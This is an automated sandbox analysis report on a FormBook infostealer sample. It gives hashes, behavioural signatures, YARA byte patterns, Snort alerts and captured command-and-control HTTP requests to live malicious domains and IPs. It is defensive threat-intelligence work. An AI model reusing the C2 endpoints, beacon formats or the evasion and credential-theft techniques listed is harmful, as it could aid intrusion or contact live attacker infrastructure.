Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TOgpmvvWoj.exe

Overview

General Information

Sample name:TOgpmvvWoj.exe
renamed because original name is a hash value
Original sample name:4815f332b8be3f9e2b173e71e751f994570fd23b0f7d3f7c519369f909f0b3c0.exe
Analysis ID:1467718
MD5:93e69765594e80ad7f8c1e906f145046
SHA1:f5d842cc344e4e1623dfcdd2ce32c73ee4ad05cb
SHA256:4815f332b8be3f9e2b173e71e751f994570fd23b0f7d3f7c519369f909f0b3c0
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TOgpmvvWoj.exe (PID: 6436 cmdline: "C:\Users\user\Desktop\TOgpmvvWoj.exe" MD5: 93E69765594E80AD7F8C1E906F145046)
    • svchost.exe (PID: 2120 cmdline: "C:\Users\user\Desktop\TOgpmvvWoj.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ftlDDsmJxbqfWuvUNSEx.exe (PID: 6932 cmdline: "C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 7264 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • ftlDDsmJxbqfWuvUNSEx.exe (PID: 6404 cmdline: "C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7548 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          6.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            6.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\TOgpmvvWoj.exe", CommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", ParentImage: C:\Users\user\Desktop\TOgpmvvWoj.exe, ParentProcessId: 6436, ParentProcessName: TOgpmvvWoj.exe, ProcessCommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", ProcessId: 2120, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\TOgpmvvWoj.exe", CommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", ParentImage: C:\Users\user\Desktop\TOgpmvvWoj.exe, ParentProcessId: 6436, ParentProcessName: TOgpmvvWoj.exe, ProcessCommandLine: "C:\Users\user\Desktop\TOgpmvvWoj.exe", ProcessId: 2120, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/04/24-16:53:24.553352
            SID:2855464
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:55:29.149800
            SID:2855464
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:54:59.779589
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:52:54.789097
            SID:2855464
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:53:22.021315
            SID:2855464
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:54:48.852255
            SID:2855464
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:55:26.621590
            SID:2855464
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:55:02.327495
            SID:2855464
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:55:13.231476
            SID:2855464
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:53:58.144607
            SID:2855464
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:54:12.061387
            SID:2855464
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:55:42.557594
            SID:2855464
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:53:44.361554
            SID:2855464
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:55:15.777514
            SID:2855464
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:54:46.311846
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:54:00.682084
            SID:2855464
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:53:46.900097
            SID:2855464
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:52:52.254180
            SID:2855464
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:54:14.588408
            SID:2855464
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-16:55:40.027987
            SID:2855464
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.sandranoll.com/aroo/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/Avira URL Cloud: Label: malware
            Source: http://www.sandranoll.com/aroo/?fhW=BLvXr6e0EhyxeX&YbCL=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG0QhvMR72FivEUbGSmkuxinEDBYWWrvqFUEDSzpZ60+MRxZstpJridvkAvira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeXAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: TOgpmvvWoj.exeReversingLabs: Detection: 60%
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: TOgpmvvWoj.exeJoe Sandbox ML: detected
            Source: TOgpmvvWoj.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411571684.000000000030E000.00000002.00000001.01000000.00000005.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556057454.000000000030E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: TOgpmvvWoj.exe, 00000004.00000003.1301147279.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, TOgpmvvWoj.exe, 00000004.00000003.1298508688.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1396440551.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1398141581.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.00000000049A0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.0000000004B3E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1484930871.0000000004630000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1488364602.00000000047EB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: TOgpmvvWoj.exe, 00000004.00000003.1301147279.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, TOgpmvvWoj.exe, 00000004.00000003.1298508688.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.1485647293.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1396440551.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1398141581.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000009.00000002.3763569921.00000000049A0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.0000000004B3E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1484930871.0000000004630000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1488364602.00000000047EB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000006.00000003.1453476434.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485400848.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762132057.0000000001268000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3768118603.0000000004FCC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3768118603.0000000004FCC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000006.00000003.1453476434.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485400848.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762132057.0000000001268000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E74696 GetFileAttributesW,FindFirstFileW,FindClose,4_2_00E74696
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_00E7C9C7
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7C93C FindFirstFileW,FindClose,4_2_00E7C93C
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00E7F200
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00E7F35D
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_00E7F65E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E73A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_00E73A2B
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E73D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_00E73D4E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_00E7BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A2BC20 FindFirstFileW,FindNextFileW,FindClose,9_2_02A2BC20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax9_2_02A19870
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h9_2_047D053E

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49705 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49706 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49712 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49713 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49716 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49717 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49720 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49721 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49724 -> 23.251.54.212:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49725 -> 23.251.54.212:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49728 -> 199.192.19.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49729 -> 199.192.19.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49732 -> 213.145.228.16:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49733 -> 213.145.228.16:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49736 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49737 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49740 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49741 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49744 -> 172.67.210.102:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.7:49745 -> 172.67.210.102:80
            Source: Joe Sandbox ViewIP Address: 23.251.54.212 23.251.54.212
            Source: Joe Sandbox ViewIP Address: 213.145.228.16 213.145.228.16
            Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
            Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: DOMAINTECHNIKAT DOMAINTECHNIKAT
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E825E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,4_2_00E825E2
            Source: global trafficHTTP traffic detected: GET /w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qe66/?YbCL=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+z+o+Zy5RZ1L4zwBfly91+2hSvhVojey3gmTZ6j57PRX7U3n66rWnGeG&fhW=BLvXr6e0EhyxeX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xzzi/?fhW=BLvXr6e0EhyxeX&YbCL=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T4RMdgNWnwSdCIYHgMQCJ4NovZBdigdGOlTiGNjGNRbnTmMSUCfOcFfR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rm91/?fhW=BLvXr6e0EhyxeX&YbCL=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH8ALvnjmtlYhpciewdwpfxiI173pYZLp0P/Ncxt8Rkrw2XK7hs/fa/r1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /li0t/?fhW=BLvXr6e0EhyxeX&YbCL=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmjHLM7Y8ZEUPvisCvQ4bRBJc30+1Sfiya8KVn3bitTBOxY938FEQPd1w HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
